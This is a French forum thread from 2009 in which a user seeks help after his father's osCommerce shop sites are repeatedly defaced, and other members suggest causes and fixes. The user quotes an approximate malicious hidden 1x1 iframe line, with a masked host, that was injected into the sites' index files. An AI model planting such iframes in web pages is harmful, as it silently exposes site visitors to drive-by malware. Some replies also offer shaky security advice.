Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1766 connectés 

  FORUM HardWare.fr
  Systèmes & Réseaux Pro
  Sécurité

  Victime d'un piratage de Site de Vente en Ligne

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Victime d'un piratage de Site de Vente en Ligne

n°54959
mayo__
Le père Noël n'existe pas !
Posté le 20-06-2009 à 23:59:33  profilanswer
 

Bonjour amis HFRiens :)

 

Alors voila, j'essaye de vous exposer le soucis le plus précisément et le plus concisément possible :

 
  • Mon père tient une PME dans la connectique, 4 agences, ca tourne bien.
  • Mais modernisme oblige, il a développé un site de vente en ligne, basé sur Oscommerce.
  • Ce site est donc hébergé chez OVH, avec 2 noms de domaines ratachés, un .fr et un .net
  • Depuis peu, il a développé un deuxieme site de vente en ligne, mais cette fois dédié uniquement à la vidéo surveillance.
  • Il l'a hébergé également chez OVH, sur un deuxieme hébergement.
  • Et encore un .fr différent rataché à ce nouveau site.


Donc je récapitule :
- 2 sites distincts sur 2 hébergements distincts. Mais les 2 sites sont composés du même ensemble de scripts php.

 

Depuis début Juin, il est victime d'un piratage.
Dans tous les fichiers comportant "index" dans leur nom, une ligne s'est retrouvé par ci par là, une fois à la ligne 60 une fois à la ligne 20, aléatoirement, comportement les balises HTML <iframe>, quelque chose ressemblant à :

Code :
  1. <iframe src="http://xxxxxxxxxxxx.com/ts/in.cgi?pcc3" width="1" height="1"></iframe>


(ceci est juste à titre d'exemple, je n'ai plus la ligne exacte en mémoire)

 

La conséquence de ces fichiers modifiés rend tout simplement le site non fonctionnel (il n'affiche plus rien à part une ligne d'erreur).

 

Ceci est plutôt TRES ennuyeux pour des professionnels... J'ai tout d'abord conseiller à mon padre de ne plus toucher à son site à partir de son boulot (je ne suis pas confiant de la sécurité locale qu'ils ont) mais d'y toucher que depuis son PC Portable (donc j'ai moi même fait l'installation et la configuration de NOD32, etc). Puis suivant les conseils d'OVH on a changé les mdp et emails de connexion aux FTP et à l'interface OVH.
On est resté 1 semaines tranquille environ (exploit sachant qu'avant ceci, le site était "repiraté" toutes les 12h environ).
Puis là, hier, BIM, les fichiers se sont retrouvés modifiés, avec en plus un _index.html apparu à la racin de /www/  ...
Donc là j'ai tenté de regarder les logs de connexions FTP, j'ai , comme je m'y attendais, trouver différentes adresses IP, jamais la meme, chaque piratage provenait d'une IP différente.
J'ai tout de meme fait un traceroute, je suis tombé un peu partout à la surface du globe, un peu aux USA, un peu en allemagne, un peu en italie... Donc proxy ou ip spoofing là dessous...

 

Je refait un point :

  • Connexion uniquement depuis 1 seul PC sécurisé.
  • Logins et Passwords OVH et FTP modifiés, ainsi qu'adresses e-mail rattachées.
  • 1 semaine sans soucis, puis repiratage.
  • Jamais la meme IP dans les logs FTP.
  • IPs n'aboutissant à rien de concret.


Alors c'est dans le plus grand désarroi que je fais appel à vous...
Dans l'idéal, il faudrait pouvoir localiser la faille, si elle provient du site web, dans les scripts PHP ou Javascript, ou bien s'il s'agit d'un virus ayant infectés les différents PCs... (Sachant qu'a chaque piratage mon pere rechange les logins/MDP/emails...)
Et biensur la corriger.

 


Je remercie mille fois d'avance ceux qui voudront bien m'aider.

 

(j'ai également posté dans la section Windows & Software / Sécurité , mais vu qu'il s'agit d'un site professionnel et que le problème est quand même assez ardu, j'ai pensé utile de le reposter ici, merci de votre compréhension :) )

 

PS : l'url du site pourrait peut-être utile :D  -> www [dot] derotronic [dot] fr (le site principal, l'autre attendra :p)


Message édité par mayo__ le 21-06-2009 à 00:03:47

---------------
Achats/Ventes / Feedback (+3200 €)
mood
Publicité
Posté le 20-06-2009 à 23:59:33  profilanswer
 

n°54960
lecharcuti​erdelinux
Posté le 21-06-2009 à 11:50:58  profilanswer
 

desactive ton serveur ftp et reactive le uniquement qd tu veux  modifier ton site, enfin si ovh permet cette fonction.
Je tiens çà dire que tu peux te retourner contre ovh car c'est eux les responsables de l'intrusion. Dis leur sinon qu'il change le port du serveur ftp (21 par défaut) ou qu'il te donne un acces via un applet java qui permet de faire de l'upload (comme webmin par exemple sous linux).
C'est dingue ça, OVH est le seul responsable et c'est à eux de te proposer un autre moyen de mettre tes fichiers online que ce serveur ftp piraté.

n°54961
mayo__
Le père Noël n'existe pas !
Posté le 21-06-2009 à 12:19:45  profilanswer
 

lecharcutierdelinux a écrit :

desactive ton serveur ftp et reactive le uniquement qd tu veux  modifier ton site, enfin si ovh permet cette fonction.
Je tiens çà dire que tu peux te retourner contre ovh car c'est eux les responsables de l'intrusion. Dis leur sinon qu'il change le port du serveur ftp (21 par défaut) ou qu'il te donne un acces via un applet java qui permet de faire de l'upload (comme webmin par exemple sous linux).
C'est dingue ça, OVH est le seul responsable et c'est à eux de te proposer un autre moyen de mettre tes fichiers online que ce serveur ftp piraté.


C'est pas vraiment eux le soucis, enfin...
J'ai un peu creusé la chose, mon père apparemment aurait été infecté sur les pc du boulot par une sorte de virus nommé "HTML:iFrame-inf.exploit" , en gros, une page web avec un exploit dans un iframe quoi... Donc ca pourrait peut etre venir de là je sais pas ><
Mais je pense qu'il doit bien y avoir une faille dans le site lui meme non ? Si c'est le cas dans ce cas OVH ne peut etre tenu responsable des "erreurs" de programmation arf..
 
Par contre penses-tu qu'il existe une sorte de filtrage IP pour les connexions FTP ? Du genre ne donner l'acces QUE aux deux IPs a partir desquelles se connecte mon pere, la maison et le boulot ?
 
Merci beaucoup :)


---------------
Achats/Ventes / Feedback (+3200 €)
n°54962
esox_ch
Posté le 21-06-2009 à 12:25:08  profilanswer
 

Salut,
 
Il y a fort à parier qu'il s'agisse d'IP dynamiques, tu pourras donc pas utiliser ce type de filtrage


---------------
Si la vérité est découverte par quelqu'un d'autre,elle perd toujours un peu d'attrait
n°54964
mayo__
Le père Noël n'existe pas !
Posté le 21-06-2009 à 12:46:16  profilanswer
 

esox_ch a écrit :

Salut,
 
Il y a fort à parier qu'il s'agisse d'IP dynamiques, tu pourras donc pas utiliser ce type de filtrage


Salut, les ips de chez moi et celle du boulot de mon pere sont des IPs fixes jusetment, c'est pour ca que ca me traverse l'esprit, jvais tenter de voir ca avec OVH,
Par contre reste toujours le probleme du virus/de la faille du site.
 
Avis aux pros :)


---------------
Achats/Ventes / Feedback (+3200 €)
n°54966
hppp
Serveur@home
Posté le 21-06-2009 à 13:06:57  profilanswer
 

va demander sur le forum de oscommerce si il y a une faille d'actualité.
 

n°54967
mayo__
Le père Noël n'existe pas !
Posté le 21-06-2009 à 13:10:47  profilanswer
 

hppp a écrit :

va demander sur le forum de oscommerce si il y a une faille d'actualité.
 


Déjà fait, le soucis c'est que personne n'a su explicitement me dire "c'est là !" mais juste ce que je me doutais déjà "ca peut venir d'un JS" ou ce genre de choses..
Mon but est vraiment de scanner tout mon site pour trouver LA faille, le soucis c'est que c'est pas dans mes capacités...


---------------
Achats/Ventes / Feedback (+3200 €)
n°54968
hppp
Serveur@home
Posté le 21-06-2009 à 13:17:59  profilanswer
 

Bien trouver une faille faut y passer quelque jours si elle est pas basic, genre si c'est pas de l'injection mysql ou autres.
 
En plus si la faille viens du serveur ftp tu peut rien y faire, regarde si tu peut désactiver ton compte ftp.
Après si ça recommence ça viendra bien de ton site, si c'est le cas regarde pour désactiver tous les JS et c'est comme ça que t'y arrivera, car c'est un robot qui semble modifier ton script, donc il le refera comme il a l'url de ton site.

n°54970
mayo__
Le père Noël n'existe pas !
Posté le 21-06-2009 à 13:23:09  profilanswer
 

Tu penses à un robot ?
Parce que je patauge grave, j'arrive pas à savoir si c'est une personne physique ou un robot qui s'occupe de ca...
Je vais voir pour filtrer les connexions au FTP ou carrément le désactiver.
Dans le cas où le problème persiste, ca voudra dire que c'est bel est bien de l'injection ou autre alors ? arf :/ Perso j'en doute, étant donné le nombre de sites qui utilisent oscommece (genre la FNAC), mais bon, verra bien.
Jte remercie ;)


---------------
Achats/Ventes / Feedback (+3200 €)
n°54971
hppp
Serveur@home
Posté le 21-06-2009 à 13:34:42  profilanswer
 

t'as pas modifier de script dans oscommerce? Dernier version installé?
 
Si quand tu désactive ton compte FTP et que t'as plus de problème pendant 3 semaines cherche pas c'est le serveur ftp qui a une faille.
 
Pour moi c'est un script/robot qui cherche des failles sur net, y a presque que ça sur le net. Car si il fallait faire ça à la mains il pourrait pas aller bien loin.

mood
Publicité
Posté le 21-06-2009 à 13:34:42  profilanswer
 

n°54972
Je@nb
Modérateur
Kindly give dime
Posté le 21-06-2009 à 14:24:34  profilanswer
 

suffit de regarder les logs apache mais tu ne dois pas y avoir accès :o

n°54973
hppp
Serveur@home
Posté le 21-06-2009 à 14:34:27  profilanswer
 

ouais aussi, normalement si, ovh laisse accès au logs apache et ftp

n°54975
mayo__
Le père Noël n'existe pas !
Posté le 21-06-2009 à 16:07:07  profilanswer
 

Pour les logs, je sais qu'on a accès aux logs FTP et HTTP, je sais pas si ovh entend par "HTTP" les logs du serveur Apache, je récupère les logs ce soir et je vous poste ca.
 
Sinon on a eu des réponses concrètes côté Oscommerce sur leur forum, c'est absolument impossible que cela vienne d'eux, tout du moins, sur la version que mon père a, sur l'ancienne il y avait des failles, mais pas sur la sienne, donc c'est bien une attaque localisée :/


---------------
Achats/Ventes / Feedback (+3200 €)
n°54980
fugitif67
Posté le 22-06-2009 à 06:39:16  profilanswer
 

Quel serveur FTP utilise OVH ?
Ca doit être noter à la connexion.

n°54983
hppp
Serveur@home
Posté le 22-06-2009 à 09:04:08  profilanswer
 

Tiens regarde par là, le même problème : http://forum.ovh.com/showthread.php?t=48519&page=4

 

Çà semble bien être un problème de pc infecté.

Message cité 1 fois
Message édité par hppp le 22-06-2009 à 09:04:27
n°55015
mayo__
Le père Noël n'existe pas !
Posté le 22-06-2009 à 12:29:32  profilanswer
 

hppp a écrit :

Tiens regarde par là, le même problème : http://forum.ovh.com/showthread.php?t=48519&page=4
 
Çà semble bien être un problème de pc infecté.


Merci beaucoup, pas le temps de lire ce midi, je ferais ce soir, mais à la toute base pour moi c'etait bien un pc infecté, maintenant lequel, j'en sais rien ><


---------------
Achats/Ventes / Feedback (+3200 €)

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Systèmes & Réseaux Pro
  Sécurité

  Victime d'un piratage de Site de Vente en Ligne

 

Sujets relatifs
Standard sur ligne fixe pour trf vers mobiles, et autresCONFIGURATION DNS POUR SITE
Changer Home Dir d'un site IIS en ligne de commande ?Site non bloqué par mon squid
Cisco 1811 & VPNMigration d'un réseau vers un site existant
Plus de sujets relatifs à : Victime d'un piratage de Site de Vente en Ligne


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR